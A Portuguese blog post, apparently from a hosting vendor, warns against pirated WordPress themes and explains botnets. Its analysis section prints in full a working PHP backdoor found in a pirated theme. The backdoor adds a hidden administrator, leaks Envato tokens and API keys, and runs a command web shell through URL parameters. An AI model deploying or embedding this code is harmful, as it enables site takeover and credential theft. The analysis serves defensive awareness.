Então você quer criar um site e a primeira coisa que você pensa é: Qual será o layout? Muitas ideias já começam a aparecer, não é mesmo? É importante buscar por modelos de layout e temas que tenham a ver com a proposta da marca, e não é difícil encontrar uma boa referência na internet.
Você não precisa procurar muito na web para encontrar sites que oferecem templates pagos de modo gratuito para CMS como o WordPress, por exemplo, você pode encontrar um tema pirata muito rápido e na maioria das vezes eles funcionam perfeitamente, ou melhor, parece que funcionam.
As versões originais de plugins e temas do WordPress, por exemplo, são bastante seguras pois possuem atualizações recorrentes. Já um tema pirata apresenta diversas ameaças para o seu site, entre elas:
Instalar softwares de origem desconhecida também prejudica seu site tornando ele uma fonte de envio em massa de spam – o que deixa com baixa reputação na internet, instalação de phishing – que pode gerar alertas para qualquer um que acesso seu site, a famosa “tela vermelha do Google” e também a perda total dos seus arquivos, posts e configurações do site.
Receber suporte dos desenvolvedores de um tema é algo que agrega valor na compra de um tema WordPress, e isso é algo que você não tem ao usar uma versão pirata. Quando você utiliza um tema pirata, não há nenhum tipo de garantia caso algo de errado ocorra, como invasões, por exemplo. Além disso, muitos temas pagos possuem garantia e reembolso, caso você não esteja insatisfeito.
Para simular e demonstrar os danos de utilizar as versões piratas, vou realizar uma análise baixando um arquivo e realizar a instalação em um ambiente de testes.
Lembre-se: O tema original pago não apresenta nenhum problema e pode ser usado com toda segurança, para a demonstração utilizei uma versão disponibilizada de forma gratuita na internet para conferir os impactos.
Descompactei os arquivos e realizei um scan com nosso antivírus para conferir as ameaças. Veja abaixo quais foram os malwares encontrados:
./class.theme-modules.php
./inc/admin/envato_setup/child-theme/class.theme-modules.php
./inc/admin/advanced/functions/class.theme-modules.php
Esses arquivos servem para varrer o seu WordPress na hora da instalação do tema e instalar vários backdoors para comando do invasor. Veja o resultado do scan após a instalação:
wp-content/themes/twentyseventeen/functions.php
wp-content/themes/twentyfifteen/functions.php
wp-content/themes/twentysixteen/functions.php
wp-content/themes/flatsome/inc/admin/envato_setup/child-theme/class.theme-modules.php
wp-content/themes/flatsome/functions.php
Vemos acima que todos os arquivos functions.php de todos os temas instalados foram infectados, essa infecção é um backdoor que nesta variação é utilizado para infectar o arquivo class.wp.php com o conteúdo abaixo:
<?php
error_reporting(0);
require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘1001010’, ‘1001010’, ‘\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870’, ‘1001010’, ‘t@e.st’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘1001010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1001010, ‘1001010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘1001010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 1001010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 1001010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’; echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘<br />’; echo esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])); echo ‘</center></h2>’; }
if( isset($_GET[‘console’]) ) {function MakeSimpleForm() { ?> <form method=’GET’ action='<?=$_SERVER[‘PHP_SELF’]?>’>
<input type=text name=’cmd’> <input type=submit name=’exec’ value=’ok’> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST[‘exec’]) && isset($_REQUEST[‘cmd’]))
DoCmd($_REQUEST[‘cmd’]); else MakeSimpleForm();}?>
O código acima permite que seja inserido um usuário no WordPress com direitos de administrador adicionando parâmetros na url:
dominioteste/wp-includes/class.wp.php?awu
awu: Add WordPress user
Com isso é criado um usuário administrador no site que dará controle total ao invasor. Por isso é importante instalar temas e plugins originais em seu site para que sempre esteja seguro e livre dessas ameaças.
Se você ainda é daqueles que pensam que a cópia pirata de um sistema é apenas uma versão “genérica” de um produto “pago” é bom ler esse texto até o final.
Na era pré-internet, as cópias piratas eram repassadas pelo dispositivo mais popular da época: Os CDs. O poder de distribuição e venda de uma cópia pirata era limitado por barreiras físicas, pois o único meio de fazê-la era o tradicional “de mão em mão”.
Na era pós-internet uma cópia pirata pode ser distribuída em escala para milhões de pessoas. É justamente esse poder de multiplicação e a possibilidade de estar instalado em milhões de computadores espalhados pelo mundo, que atraiu a atenção dos criminosos cibernéticos, também conhecido como “Hackers”.
No que os Hackers estão interessados?
Um “Hacker” não ganha dinheiro vendendo cópias piratas de programa de computador. Ele está interessado em crimes muito maiores e consequentemente, mais rentáveis. Porém, para executar esses crimes sem serem rastreados e descobertos, fazem uso de máquinas zumbis.
Como as máquinas Zumbis surgem?
Para que um computador se torne um Zumbi (também conhecido como botnet) ele precisa ser infectado por um vírus tipo malware. Para executar uma infecção em massa os Hackers inserem o vírus em versões piratas de programas com grande poder de proliferação, ou seja, nos programas mais cobiçados pelos usuários. Essas versões piratas infectadas são copiadas, multiplicadas e instaladas em milhões de computadores pessoais pelo mundo e formaram um verdadeiro exército de máquinas zumbis. Uma vez infectado o computador passa a ser controlado de forma remota por cybercriminosos.
Embora pareça estranho, é justamente essa a intenção do cybercriminoso. A aparente normalidade do computador e o funcionamento perfeito do programa pirata escondem um inimigo perigoso. Na realidade o objetivo desse vírus não é apagar arquivos ou danificar o sistema operacional. Seu objetivo é outro: Permitir que o seu computador seja acessado remotamente e de forma transparente a sua percepção.
Computadores zumbis são utilizados por hackers para a prática dos mais variados crimes, como: Invasão a instituições financeiras, roubo de informações confidenciais, compras fraudulentas, sequestro de banco de dados, armazenamento e distribuição de conteúdo pornográficos, envio de e-mails spam entre outros.
Manter o meu anti-virus atualizado não impede que meu computador se torne um Zumbi?
Hackers conseguem invadir servidores blindados e protegidos com sofisticados sistemas firewall. Como pode você acreditar que um anti-virus para computador pessoal será o suficiente para impedí-los?
Obviamente que não. Contudo, quando se trata do ambiente digital, as pessoas agem de forma completamente displicente, para não dizer inocente. Permitir que um programa pirata de origem totalmente desconhecida seja instalado em seu computador é o mesmo que trazer um estranho para a sua residência e lhe dar todas as chaves das portas, acesso a todos os cômodos, armários, gavetas e documentos. Embora a comparação parece desproporcional é justamente isso que ocorre: você dá acesso total a um desconhecido. Pense nisso!
Agora você já pode refletir a respeito das consequências e as proporções que uma simples licença pirata pode acarretar. Definitivamente versões piratas não combinam com os dias atuais. ZEUS
PHP® TOTALMENTE CONTRA A SISTEMAS E SOFTWARES PIRATAS